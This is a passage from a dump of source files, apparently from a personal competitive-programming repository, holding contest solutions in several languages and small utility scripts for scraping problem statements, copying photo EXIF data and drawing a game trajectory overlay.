tri\n{\n int x, y, i;\n tri(){}\n tri(int x, int y, int z)\n {\n this->x = x;\n this->y = y;\n this->i = z;\n }\n bool operator<(tri const& a) const\n {\n if (y == a.y)\n return x < a.x;\n return y < a.y;\n }\n};\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n //freopen(\"output.txt\", \"w\", stdout);\n int n, a, b;\n scanf(\"%d %d %d\\n\", &n, &a, &b);\n\n vector<tri> a1, a2, a3, a4;\n int x, y;\n for (int i = 0; i < n; i++)\n {\n scanf(\"%d %d\", &x ,&y);\n a1.push_back(tri(x, y, i + 1));\n }\n sort(a1.begin(), a1.end());\n long long count = 0;\n for (int i = 0; i < a1.size(); i++)\n {\n if (a1[i].x == 1)\n if (a2.size() < a && a2.size() + a3.size() + a4.size() < a + b)\n a2.push_back(a1[i]),\n count += a1[i].y;\n if (a1[i].x == 2)\n if (a3.size() < b && a2.size() + a3.size() + a4.size() < a + b)\n a3.push_back(a1[i]),\n count += a1[i].y;\n if (a1[i].x == 3)\n if (a2.size() + a3.size() + a4.size() < a + b)\n a4.push_back(a1[i]),\n count += a1[i].y; else\n break;\n }\n cout << a2.size() + a3.size() + a4.size() << \" \" << count << endl;\n int k = 1;\n for (int i = 0; i < a2.size(); i++, k++)\n printf(\"%d %d\\n\", a2[i].i, k);\n int j = 0;\n for (int i = 0; i < min(a - a2.size(), a4.size()); i++, j++, k++)\n printf(\"%d %d\\n\", a4[i].i, k);\n k = max(a + 1, k);\n for (int i = 0; i < a3.size(); i++, k++)\n printf(\"%d %d\\n\", a3[i].i, k);\n for (int i = j; i < a4.size(); i++, k++)\n printf(\"%d %d\\n\", a4[i].i, k);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5535714030265808, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 27, "blob_id": "235dac81e4145083c3dd1d68cacad534da8ce527", "content_id": "05e53a03b25d360674ff80178d933a43f70fde47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 38, "num_lines": 2, "path": "/CodeForce/0769/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 
int(input())\nprint(sorted(input().split())[n // 2])\n" }, { "alpha_fraction": 0.38978493213653564, "alphanum_fraction": 0.4032258093357086, "avg_line_length": 18.578947067260742, "blob_id": "4e4feab9792266e2265195edfac8ee602ce30631", "content_id": "34bc734960ffee0f61ea72987fc5331dd67204c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1488, "license_type": "no_license", "max_line_length": 81, "num_lines": 76, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.01/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n\nusing namespace std;\n\nvector< vector<int> > edges;\nvector<int> d;\nvector<bool> used;\nint n, m, k;\n\nbool dfs(int v)\n{\n if (used[v])\n return false;\n used[v] = true;\n for (int i = 0; i < edges[v].size(); i++)\n {\n int u = edges[v][i];\n if (d[u] == -1 || dfs(d[u]))\n {\n d[u] = v;\n return true;\n }\n }\n return false;\n}\n\nvoid run()\n{\n scanf(\"%d\\n\", &n);\n edges.clear();\n edges.resize(n + 1);\n d.clear();\n d.resize(n + 1, -1);\n char x;\n for (int i = 0; i < n; i++)\n {\n for (int j = 0; j < n; j++)\n {\n scanf(\"%c\", &x);\n if (x == '1')\n edges[i].push_back(j);\n }\n scanf(\"\\n\");\n }\n// for (int i = 0; i < n; i++)\n // for (int j = 0; j < edges[i].size(); j++)\n // printf(\"%d%c\", edges[i][j], j == edges[i].size() - 1 ? '\\n' : ' ');\n int c = 0;\n for (int i = 0; i < n; i++)\n {\n used.clear();\n used.resize(n + 1, false);\n dfs(i);\n }\n \tfor (int i = 0; i < n; i++)\n\t\tif (d[i] != -1)\n c++;\n //printf(\"%d\\n\", c);\n printf(c % 4 == 0 ? 
\"YES\\n\" : \"NO\\n\");\n}\n\nint main()\n{\n freopen(\"matching.in\", \"r\", stdin);\n freopen(\"matching.out\", \"w+\", stdout);\n int T;\n scanf(\"%d\\n\", &T);\n for (int TT = 0; TT < T; TT++)\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.45384615659713745, "alphanum_fraction": 0.4769230782985687, "avg_line_length": 20.66666603088379, "blob_id": "b281bcbea2212795dbde9225daf3f90ef0f7f599", "content_id": "6af818799cb82a9ffff1831ff949086669edf3ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 130, "license_type": "no_license", "max_line_length": 77, "num_lines": 6, "path": "/CodeForce/0411/allLanguages/rb.rb", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "line=gets()\nif (line =~ /.{5,}/ && line =~ /[0-9]/ && line =~ /[A-Z]/ && line =~ /[a-z]/)\nputs \"Correct\"\nelse\nputs \"Too weak\"\nend\n" }, { "alpha_fraction": 0.4474138021469116, "alphanum_fraction": 0.46336206793785095, "avg_line_length": 27.64197540283203, "blob_id": "e83d9cbe34c0fd49b193142cbcec0f23ebd64270", "content_id": "cfede11cc915a0684f9d41b2ea6eed6bdc96d07f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2320, "license_type": "no_license", "max_line_length": 96, "num_lines": 81, "path": "/2015/RCC1C/rcc.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\nfrom html.parser import HTMLParser\nimport re\n\nroundId = 38\n\ndef entity2char(x):\n if x.startswith('&#x'):\n return chr(int(x[3:-1],16))\n elif x.startswith('&#'):\n return chr(int(x[2:-1]))\n else:\n if x == 'x2264' or x == '8804':\n return '<='\n if x == 'xab' or x == 'xbb':\n return '\"'\n return 'FAIL ' + x + ' FAIL'\n\nclass RCCParser(HTMLParser):\n\n def __init__(self):\n HTMLParser.__init__(self)\n self.parsing = -1\n self.problem = ''\n self.su = False\n\n def handle_starttag(self, tag, attrs):\n if tag == 'div':\n if self.parsing > 0:\n self.parsing += 1\n 
try:\n (x, y) = attrs[0]\n if x == 'class' and y == 'container prog-task-detail':\n self.parsing = 1\n except:\n 42\n elif tag == 'p':\n self.problem += '\\n'\n elif tag == 'sub':\n if self.parsing > 0:\n self.problem += '_'\n self.su = True\n elif tag == 'sup':\n if self.parsing > 0:\n self.problem += '^'\n self.su = True\n def handle_endtag(self, tag):\n if tag == 'div':\n if self.parsing > 0:\n self.parsing -= 1\n\n def handle_data(self, data):\n if self.parsing > 0:\n if self.su and ('-' in data or '+' in data or '*' in data or '/' in data):\n data = '(' + data + ')'\n self.su = False\n self.problem += data\n\n def handle_entityref(self, name):\n if self.parsing > 0:\n self.problem += self.unescape(('&%s;' % name))\n\n def handle_charref(self, name):\n if self.parsing > 0:\n self.problem += entity2char(name)\n\nindexes = ['A', 'B', 'C', 'D', 'E']\n\nfor index in indexes:\n url = 'http://www.russiancodecup.ru/championship/round/{}/problem/{}'.format(roundId, index)\n x = RCCParser()\n x.feed(requests.post(url).text)\n p = x.problem\n p = re.sub(r' +', ' ', p)\n p = re.sub(r'\\n\\s+', '\\n', p)\n p = re.sub(r'^\\n*', '', p)\n splited = 2\n if index != indexes[0] and index != indexes[-1]:\n splited = 3\n p = p.rsplit('\\n', splited)[0]\n open(index + '.problem', 'w').write(p + '\\n')\n" }, { "alpha_fraction": 0.3441033959388733, "alphanum_fraction": 0.35379645228385925, "avg_line_length": 17.75757598876953, "blob_id": "218617939c6c1d26db7549a4f5349b971a7d5922", "content_id": "76d81480bf5457d53ac47d909d3eab68f82cdeb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 619, "license_type": "no_license", "max_line_length": 53, "num_lines": 33, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.23/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdio>\n#include <vector>\n#include <algorithm>\n\nusing namespace std;\n\nint n;\n\nvector <int> a;\nint main(){\n cin 
>> n;\n int x, y, ans = 0;\n for (int i = 0; i < n; ++i){\n cin >> y >> x;\n int c = a.size();\n if (c == 0 || x > a[c - 1]){\n a.push_back(x);\n ans++;\n }\n else{\n while (a.size() && x < a[a.size() - 1]){\n a.pop_back();\n }\n if (!(a.size() && x == a[a.size() - 1])){\n a.push_back(x);\n ans++;\n }\n }\n }\n cout << ans;\n\n}\n" }, { "alpha_fraction": 0.38016995787620544, "alphanum_fraction": 0.3971671462059021, "avg_line_length": 18.61111068725586, "blob_id": "975e6c64fbc109bd2eded4308268d2b353cf02eb", "content_id": "66a1322c44c306e6fc3a330f03f9aae7361cc765", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1765, "license_type": "no_license", "max_line_length": 50, "num_lines": 90, "path": "/trash/lab_da_smthng/minimax/main.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n\nusing namespace std;\n\nconst int INF = 1000000001;\nint n;\nvector< vector< int > > a;\nvector<int> dr, dc, p, minpos, minv;\nvector<bool> vis;\n\nint dfs(int k)\n{\n vis[k] = true;\n int t = p[k];\n int temp = k;\n int d = INF;\n for (int j = 1; j <= n; j++)\n if (!vis[j])\n {\n if (a[t][j] - dr[t] - dc[j] < minv[j])\n {\n minv[j] = a[t][j] - dr[t] - dc[j];\n minpos[j] = k;\n }\n if (minv[j] < d)\n {\n d = minv[j];\n temp = j;\n }\n }\n for (int j = 0; j <= n; j++)\n if (vis[j])\n {\n dr[p[j]] += d;\n dc[j] -= d;\n } else\n minv[j] -= d;\n return p[temp] != 0 ? 
dfs(temp) : temp;\n}\n\nvoid rec(int k)\n{\n p[k] = p[minpos[k]];\n if (minpos[k] != 0)\n rec(minpos[k]);\n}\n\nint ans()\n{\n for (int i = 1; i <= n; i++)\n {\n p[0] = i;\n minv.clear();\n vis.clear();\n minv.resize(n + 1, INF);\n vis.resize(n + 1, false);\n rec(dfs(0));\n }\n return -dc[0];\n}\n\nint main()\n{\n freopen(\"assignment.in\", \"r\", stdin);\n freopen(\"assignment.out\", \"w+\", stdout);\n scanf(\"%d\\n\", &n);\n a.resize(n + 1);\n dr.resize(n + 1);\n dc.resize(n + 1);\n p.resize(n + 1);\n minpos.resize(n + 1);\n for (int i = 1; i <= n; i++)\n {\n a[i].resize(n + 1);\n for (int j = 1; j <= n; j++)\n scanf(\"%d\", &a[i][j]);\n scanf(\"\\n\");\n }\n printf(\"%d\\n\", ans());\n for (int i = 1; i <= n; i++)\n printf(\"%d %d\\n\", p[i], i);\n fclose(stdin);\n fclose(stdout);\n return 0;\n}\n" }, { "alpha_fraction": 0.3886210322380066, "alphanum_fraction": 0.4223722219467163, "avg_line_length": 29.5, "blob_id": "e9d2a48372579f40d2f2886f13d74d4f940855a7", "content_id": "aaa84fb72b541f2cc738e6929a163d161d60369f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1037, "license_type": "no_license", "max_line_length": 156, "num_lines": 34, "path": "/scripts/copyExif.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "o=\"[0-9]*.jpg\"\ndir=${PWD##*/}\nfor i in $(ls); do\n if [[ -f $i ]]; then\n continue\n fi\n cd $i\n f=$(ls *IMG* | head -1)\n echo $i $f\n ex=$(exiv2 -p e $f | awk {'{printf $1 \"\\n\"; }'})\n for exifName in $ex; do\n exiv2 -v -M\"set $exifName $(exiv2 -p e $f | grep $exifName | head -1 | awk {'{for (i=4; i<NF; i++) printf $i \" \"; print $NF}'})\" $o 1>/dev/null 2>&1\n done\n exiv2 -v -M\"set Exif.Image.Orientation 1\" $o 1>/dev/null\n\n for j in $o; do\n if [[ -f $j ]]; then\n\n #exiv2 $f | grep timestamp | awk '{print $4$5}' | sed 's/:/ /g' | awk '{print $2$3$4}'\n #touch -amt $(exiv2 $f | grep timestamp | awk '{print $4$5}' | sed 's/:/ /g' | awk '{print $2$3$4}') $j\n 
d=\"$(date -r $f '+%Y-%m-%d %T %z')\"\n echo \"touch -d $d $j\"\n touch -d \"$d\" $j\n #touch -amt \"04272320\" $j\n fi\n done\n for j in $o; do\n if [[ -f $j ]]; then\n echo $dir$j\n cp -p \"$j\" \"../$dir$j\"\n fi\n done\n cd ..\ndone\n" }, { "alpha_fraction": 0.5043478012084961, "alphanum_fraction": 0.52173912525177, "avg_line_length": 56.5, "blob_id": "fd3b55857650d3c122b76143a83c1db57560fce1", "content_id": "ad3c89ef0c743ad90dd3cfa7381bee711ef4889f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 230, "license_type": "no_license", "max_line_length": 190, "num_lines": 4, "path": "/2015/tpp/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\nn = int(input())\ns = input()\nprint(\"YES\" if len(s) >= n and re.search(\"^([a-z]|[A-Z]|[0-9])*$\", s) != None and re.search(\"[a-z]\", s) != None and re.search(\"[A-Z]\", s) != None and re.search(\"[0-9]\", s) != None else \"NO\")\n" }, { "alpha_fraction": 0.5375335216522217, "alphanum_fraction": 0.5690348744392395, "avg_line_length": 28.254901885986328, "blob_id": "60c3a4bcbc08141ee61dd57751938708bbd7b0ea", "content_id": "c8d1ecb673f71cfb9b236d2a9dece5e71a8fde5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1492, "license_type": "no_license", "max_line_length": 70, "num_lines": 51, "path": "/scripts/shariki.js", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "let sx = 353;\nlet sy = 347;\nlet r = 21;\nlet mnx = 145 + r;\nlet mxx = 565 - r;\nlet svg = (...path) => `${sx} ${sy} ${path.join(' ')}`;\n\nlet xmlns = 'http://www.w3.org/2000/svg';\nlet boxWidth = 600;\nlet boxHeight = 400;\n\nlet svgElem = document.createElementNS(xmlns, 'svg');\nsvgElem.setAttributeNS(null, 'width', boxWidth);\nsvgElem.setAttributeNS(null, 'height', boxHeight);\nsvgElem.style['z-index'] = '10000 !important';\nsvgElem.style['position'] = 
'absolute';\nsvgElem.style['pointer-events'] = 'none';\n\nlet g = document.createElementNS(xmlns, 'polyline');\ng.setAttributeNS(null, 'points', svg(0, 0))\ng.setAttributeNS(null, 'style', 'fill:none;stroke:red;stroke-width:1')\nsvgElem.appendChild(g);\n\nlet el = document.getElementById('game').childNodes[5].childNodes[0]\n\nel.insertBefore(svgElem, el.firstChild);\n\nlet eventListener = el => e => {\n let x = e.clientX - 55;\n let y = e.clientY - 255;\n if (y >= 320) return;\n let temp = [];\n if (x == sx)\n temp = [x, 0];\n else {\n let m = x > sx ? mxx : mnx;\n let getB = m => (m * (sy - y) + sx * y - sy * x) / (sx - x);\n let b = getB(m);\n let neb = getB(m == mxx ? mnx : mxx);\n let dy = neb - b;\n while (temp.length < 20) {\n temp = temp.concat(m, b);\n if (b < 0) break;\n m = m == mxx ? mnx : mxx;\n b -= dy;\n }\n }\n el.setAttributeNS(null, 'points', svg(...temp))\n};\n\nwindow.addEventListener('mousemove', eventListener(g), false)\n" }, { "alpha_fraction": 0.48966407775878906, "alphanum_fraction": 0.49896639585494995, "avg_line_length": 15.192468643188477, "blob_id": "88741dc2a0634c0971a0f2d9eebe9236a51cc615", "content_id": "bf3168f0c0cf23a670b9ec39bdbd7b52193b2b03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3870, "license_type": "no_license", "max_line_length": 72, "num_lines": 239, "path": "/CodeForce/0589/G.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.BufferedReader;\nimport java.io.File;\nimport java.io.FileReader;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.io.PrintWriter;\nimport java.util.ArrayList;\nimport java.util.Arrays;\nimport java.util.Comparator;\nimport java.util.HashMap;\nimport java.util.HashSet;\nimport java.util.List;\nimport java.util.Map;\nimport java.util.Set;\nimport java.util.StringTokenizer;\n\npublic class G {\n\n\tstatic BufferedReader bufferedReader;\n\tstatic StringTokenizer 
stringTokenizer;\n\tstatic PrintWriter out;\n\n\tclass Node {\n\t\tNode l, r;\n\t\tint f, t;\n\n\t\tint[] a, b, c;\n\t\tint[] u, d;\n\n\t\tlong[] s;\n\n\t\tNode(int id, int val) {\n\t\t\ta = new int[] { val };\n\t\t\tb = new int[] { id };\n\t\t\ts = new long[] { id };\n\n\t\t\tf = t = id;\n\t\t}\n\n\t\tNode(Node l, Node r) {\n\t\t\tthis.l = l;\n\t\t\tthis.r = r;\n\n\t\t\tf = l.f;\n\t\t\tt = r.t;\n\n\t\t\tint n = l.a.length;\n\t\t\tint m = r.a.length;\n\n\t\t\ta = new int[n + m];\n\t\t\tb = new int[n + m];\n\t\t\tc = new int[n + m];\n\n\t\t\tfor (int lp = 0, rp = 0, i = 0; i < a.length; i++) {\n\t\t\t\tif ((lp < n && (rp >= m || l.a[lp] <= r.a[rp]))) {\n\t\t\t\t\ta[i] = l.a[lp];\n\t\t\t\t\tb[i] = l.b[lp];\n\t\t\t\t\tc[i] = ~lp;\n\t\t\t\t\t++lp;\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\ta[i] = r.a[rp];\n\t\t\t\t\tb[i] = r.b[rp];\n\t\t\t\t\tc[i] = rp;\n\t\t\t\t\t++rp;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tu = new int[n + m];\n\t\t\td = new int[n + m];\n\n\t\t\ts = new long[n + m];\n\n\t\t\tint pu = -1, pd = -1;\n\t\t\tlong ps = 0;\n\n\t\t\tfor (int i = 0; i < s.length; i++) {\n\t\t\t\tu[i] = pu;\n\t\t\t\td[i] = pd;\n\t\t\t\ts[i] = ps;\n\n\t\t\t\tif (c[i] < 0) {\n\t\t\t\t\tu[i] = i;\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\td[i] = i;\n\t\t\t\t}\n\n\t\t\t\ts[i] += b[i];\n\n\t\t\t\tpu = u[i];\n\t\t\t\tpd = d[i];\n\t\t\t\tps = s[i];\n\n\t\t\t}\n\n\n\t\t}\n\n\t\tvoid sum(int from, int to, int i) {\n\t\t\tif (to < from || t < from || to < f) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tif (from <= f && t <= to) {\n\t\t\t\tcurSum += s[i];\n\t\t\t\tcnt += i + 1;\n\t\t\t}\n\t\t\telse {\n\n\t\t\t\tint lp = u[i];\n\t\t\t\tif (lp != -1) {\n\t\t\t\t\tl.sum(from, to, ~c[lp]);\n\t\t\t\t}\n\n\t\t\t\tint rp = d[i];\n\t\t\t\tif (rp != -1) {\n\t\t\t\t\tr.sum(from, to, c[rp]);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t}\n\n\tlong curSum;\n\tlong cnt;\n\n\tlong sum(int d, int k) {\n\t\tcurSum = cnt = 0;\n\t\ttree.sum(d + 1, 1 << 21, k);\n\t\treturn curSum - cnt * d;\n\t}\n\n\tNode[] node;\n\tNode tree;\n\n\tvoid run() 
{\n\n\t\tint q = nextInt(), n = nextInt();\n\n\t\tnode = new Node[n];\n\n\t\tfor (int i = 0; i < n; i++) {\n\t\t\tint t = nextInt();\n\t\t\tnode[i] = new Node(t, i);\n\t\t}\n\n\t\tArrays.sort(node, new Comparator<Node>() {\n\t\t\tpublic int compare(Node u, Node v) {\n\t\t\t\tint cmp = Integer.compare(u.f, v.f);\n\t\t\t\tif (cmp == 0) {\n\t\t\t\t\treturn Integer.compare(u.a[0], v.a[0]);\n\t\t\t\t}\n\t\t\t\treturn cmp;\n\t\t\t}\n\t\t});\n\n\t\tint size = n;\n\t\twhile (size > 1) {\n\t\t\tint cur = 0;\n\n\t\t\tfor (int i = 1; i < size; i += 2) {\n\t\t\t\tnode[cur++] = new Node(node[i - 1], node[i]);\n\t\t\t}\n\n\t\t\tif (size % 2 == 1) {\n\t\t\t\tnode[cur++] = node[size - 1];\n\t\t\t}\n\t\t\tsize = cur;\n\t\t}\n\n\t\ttree = node[0];\n\n\t\twhile (--q >= 0) {\n\t\t\tint d = nextInt(), r = nextInt();\n\n\t\t\tint x = 0, y = n - 1;\n\n\t\t\twhile (y - x > 1) {\n\t\t\t\tint z = (x + y) / 2;\n\n\t\t\t\tif (sum(d, z) < r) {\n\t\t\t\t\tx = z;\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\ty = z;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif (sum(d, x) < r) {\n\t\t\t\t++x;\n\t\t\t}\n\n\t\t\tif (x == n || sum(d, x) < r) {\n\t\t\t\tout.print(0);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tout.print(x + 1);\n\t\t\t}\n\t\t\tout.print(' ');\n\n\t\t}\n\n\t}\n\n\tint nextInt() {\n\t\treturn Integer.parseInt(next());\n\t}\n\n\tlong nextLong() {\n\t\treturn Long.parseLong(next());\n\t}\n\n\tString next() {\n\t\twhile (stringTokenizer == null || !stringTokenizer.hasMoreTokens()) {\n\t\t\tstringTokenizer = new StringTokenizer(nextLine());\n\t\t}\n\t\treturn stringTokenizer.nextToken();\n\t}\n\n\tString nextLine() {\n\t\ttry {\n\t\t\treturn bufferedReader.readLine();\n\t\t}\n\t\tcatch (IOException err) {\n\t\t\treturn null;\n\t\t}\n\t}\n\n\tpublic static void main(String[] args) throws IOException {\n\t\tbufferedReader = new BufferedReader(new InputStreamReader(System.in));\n\t\tout = new PrintWriter(System.out);\n\t\t// bufferedReader = new BufferedReader(new FileReader(task + \".txt\"));\n\t\t// out = new 
PrintWriter(new File(task + \".out\"));\n\t\tnew G().run();\n\t\tout.close();\n\t\tbufferedReader.close();\n\t}\n}\n" }, { "alpha_fraction": 0.5308411121368408, "alphanum_fraction": 0.5489096641540527, "avg_line_length": 24.887096405029297, "blob_id": "d8f12f9a8ae340b741c637f7edc2fbfa7d80dbfd", "content_id": "e95885d224248d9b19bbfe59e53b8fd6d5c22bcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1605, "license_type": "no_license", "max_line_length": 100, "num_lines": 62, "path": "/2021/yandexBackendQual/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\nfrom xml.etree import ElementTree\n\ncontest = input()\nserver = 'http://127.0.0.1:7777/'\n\ndef get(url):\n response = requests.get(url)\n tree = ElementTree.fromstring(response.content)\n return tree\n\ndef participants():\n return get(server + f'view/participants?contest={contest}')\n\ndef submissions(login):\n return get(server + f'view/submissions?contest={contest}&login={login}')\n\n\nclass participant:\n def __init__(self, name, submissions):\n self.name = name\n self.ok = 0\n self.t = 0\n problems = set()\n s = {}\n cur = []\n for submit in submissions:\n cur.append([int(submit.get('timestamp')), submit.get('problem'), submit.get('verdict')])\n cur.sort(key = lambda submit: submit[0])\n for submit in cur:\n if submit[1] in problems:\n continue\n if submit[2] == 'CE':\n continue\n if submit[2] == 'OK':\n self.ok += 1\n self.t += submit[0] + s.get(submit[1], 0) * 20\n problems.add(submit[1])\n else:\n s[submit[1]] = s.get(submit[1], 0) + 1\n\n\n def __str__(self):\n return f'{self.name}, {self.ok}, {self.t}'\n\n\na = []\npars = participants()\nfor p in pars:\n login = p.get('login')\n subms = submissions(login)\n a.append(participant(login, subms))\n\na.sort(key = lambda p: [-p.ok, p.t])\nwinners = []\nfor i in range(len(a)):\n if a[i].ok == a[0].ok and a[i].t == a[0].t:\n 
winners.append(a[i].name)\n\nwinners.sort()\nprint(len(winners))\nprint(*winners, sep = '\\n')\n" }, { "alpha_fraction": 0.345502644777298, "alphanum_fraction": 0.36640211939811707, "avg_line_length": 32.45132827758789, "blob_id": "9d130c8de6a2500612e0f537f5f41004ad98f060", "content_id": "d4da494f8e7cafc187cb2b9e7967cfd28b210606", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3780, "license_type": "no_license", "max_line_length": 119, "num_lines": 113, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.25/GTODO.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n \n#define fori(n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n \n#define fst first\n#define snd second\n#define pb push_back\n \ndouble const eps = 0.000000001;\n \nusing namespace std;\n \nstruct segment\n{\n double x, y, q, w;\n segment(double a, double b, double c, double d)\n {\n x = a;\n y = b;\n q = c;\n w = d;\n }\n};\n \ndouble dist(double x1, double y1, double x2, double y2)\n{\n return sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2));\n}\n \nint ori(double x1, double y1, double x2, double y2, double x3, double y3)\n{\n double t = (x1 * y2 - x2 * y1) + (y1 * x3 - x1 * y3) + (x2 * y3 - x3 * y2);\n return t > eps ? -1 : t < -eps ? 
1 : 0;\n}\n \ndouble distance(double sx, double sy, double a, double b, double c, double d)\n{\n if (a >= sx)\n return dist(sx, sy, a, b);\n if (c <= sx)\n return dist(sx, sy, c, d);\n //cout << \"lol \" << sy << \" \" << b << \"\\n\";\n return sy - b;\n}\n\nint main()\n{\n// freopen(\"in\", \"r\", stdin);\n int n;\n while (true)\n {\n cin >> n;\n if (n == 0)\n return 0;\n double sx, sy, x, y, z;\n cin >> sx >> sy;\n vector<segment> a;\n fori(n)\n cin >> y >> x >> z,\n a.pb(segment(x, y, z, y));\n segment t = a[0];\n double answer = 0;\n // fori(a.size())\n// a.pb(segment(a.back().x - 1, a.back().y, a.back().q + 1, a.back().w));\n fori1(a.size() - 1)\n {\n/* cout << \"S = \" << sx << \" \" << sy << \"\\n\";\n cout << \"T = \" << t.x << \" \" << t.y << \" \" << t.q << \" \" << t.w << \"\\n\";\n cout << \"a[i] = \" << a[i].x << \" \" << a[i].y << \" \" << a[i].q << \" \" << a[i].w << \"\\n\";\n cout << \"answer = \" << answer << \"\\n\\n\";\n */ //cout << \"ori s tb a[i]e \" << ori(sx, sy, t.x, t.y, a[i].q, a[i].w) << \"\\n\";\n //cout << \"ori s te a[i]b \" << ori(sx, sy, t.q, t.w, a[i].x, a[i].y) << \"\\n\";\n if (ori(sx, sy, t.x, t.y, a[i].q, a[i].w) != -1)\n answer += dist(sx, sy, t.x, t.y),\n sx = t.x,\n sy = t.y,\n t = a[i];\n else\n if (ori(sx, sy, t.q, t.w, a[i].x, a[i].y) != 1)\n answer += dist(sx, sy, t.q, t.y),\n sx = t.q,\n sy = t.w,\n t = a[i];\n else\n {\n if (ori(sx, sy, t.x, t.y, a[i].x, a[i].y) != 1)\n t.x = a[i].x,\n t.y = a[i].y;\n if (ori(sx, sy, t.q, t.w, a[i].q, a[i].w) != -1)\n t.q = a[i].q,\n t.w = a[i].w;\n }\n }\n //cout << \"answer = \" << answer << \"\\n\";\n //cout << \"S = \" << sx << \" \" << sy << \"\\nT = \";\n //cout << t.x << \" \" << t.y << \" \" << t.q << \" \" << t.w << \"\\nF = \";\n //cout << a.back().x << \" \" << a.back().y << \" \" << a.back().q << \" \" << a.back().w << \"\\n\";\n if (((abs(ori(sx, sy, t.x, t.y, a.back().x, a.back().y) +\n ori(sx, sy, t.x, t.y, a.back().q, a.back().w)) == 2 &&\n ori(sx, sy, sx, -1000000, 
t.x, t.y) == -1) ||\n\n (abs(ori(sx, sy, t.q, t.w, a.back().x, a.back().y) +\n ori(sx, sy, t.q, t.w, a.back().q, a.back().w)) == 2 &&\n ori(sx, sy, sx, -1000000, t.q, t.w) == 1)))\n answer += min(dist(sx, sy, t.x, t.y) + distance(t.x, t.y, a.back().x, a.back().y, a.back().q, a.back().w),\n dist(sx, sy, t.q, t.w) + distance(t.q, t.w, a.back().x, a.back().y, a.back().q, a.back().w));\n else\n answer += distance(sx, sy, a.back().x, a.back().y, a.back().q, a.back().w);\n printf(\"%.11lf\\n\", answer);\n }\n}\n" }, { "alpha_fraction": 0.28270041942596436, "alphanum_fraction": 0.3164556920528412, "avg_line_length": 25.33333396911621, "blob_id": "6283c0719c5b9639b5ed98d29846db882c9b245e", "content_id": "572e1e9c8a1133c3378d089d159c587696f4a183", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 68, "num_lines": 9, "path": "/CodeForce/0552/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "e = '1*' + input() + '*1'\nl = len(e)\na = 0\nfor i in range(2, l, 2):\n if (e[i - 1] == '*'):\n for j in range(i + 1, l, 2):\n if e[j] == '*':\n a = max(a, eval(e[:i] + '(' + e[i:j] + ')' + e[j:]))\nprint(a)\n" }, { "alpha_fraction": 0.4714946150779724, "alphanum_fraction": 0.4869029223918915, "avg_line_length": 21.379310607910156, "blob_id": "b44fe6a005a3b7f3ca2b5d00717b4b3810333ab9", "content_id": "2ac8798500a2d5bfbc79ee93f6887e37ab8d1948", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 649, "license_type": "no_license", "max_line_length": 50, "num_lines": 29, "path": "/2021/yandexBackendFinal/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import json\nimport sys\nsys.setrecursionlimit(10000000)\n\nn = int(input())\nroot = {}\n\ndef dfs(root, cur, attrs):\n for k in cur.keys():\n if k in attrs:\n root[k] = cur[k]\n else:\n if not k in root:\n root[k] = {}\n dfs(root[k], cur[k], 
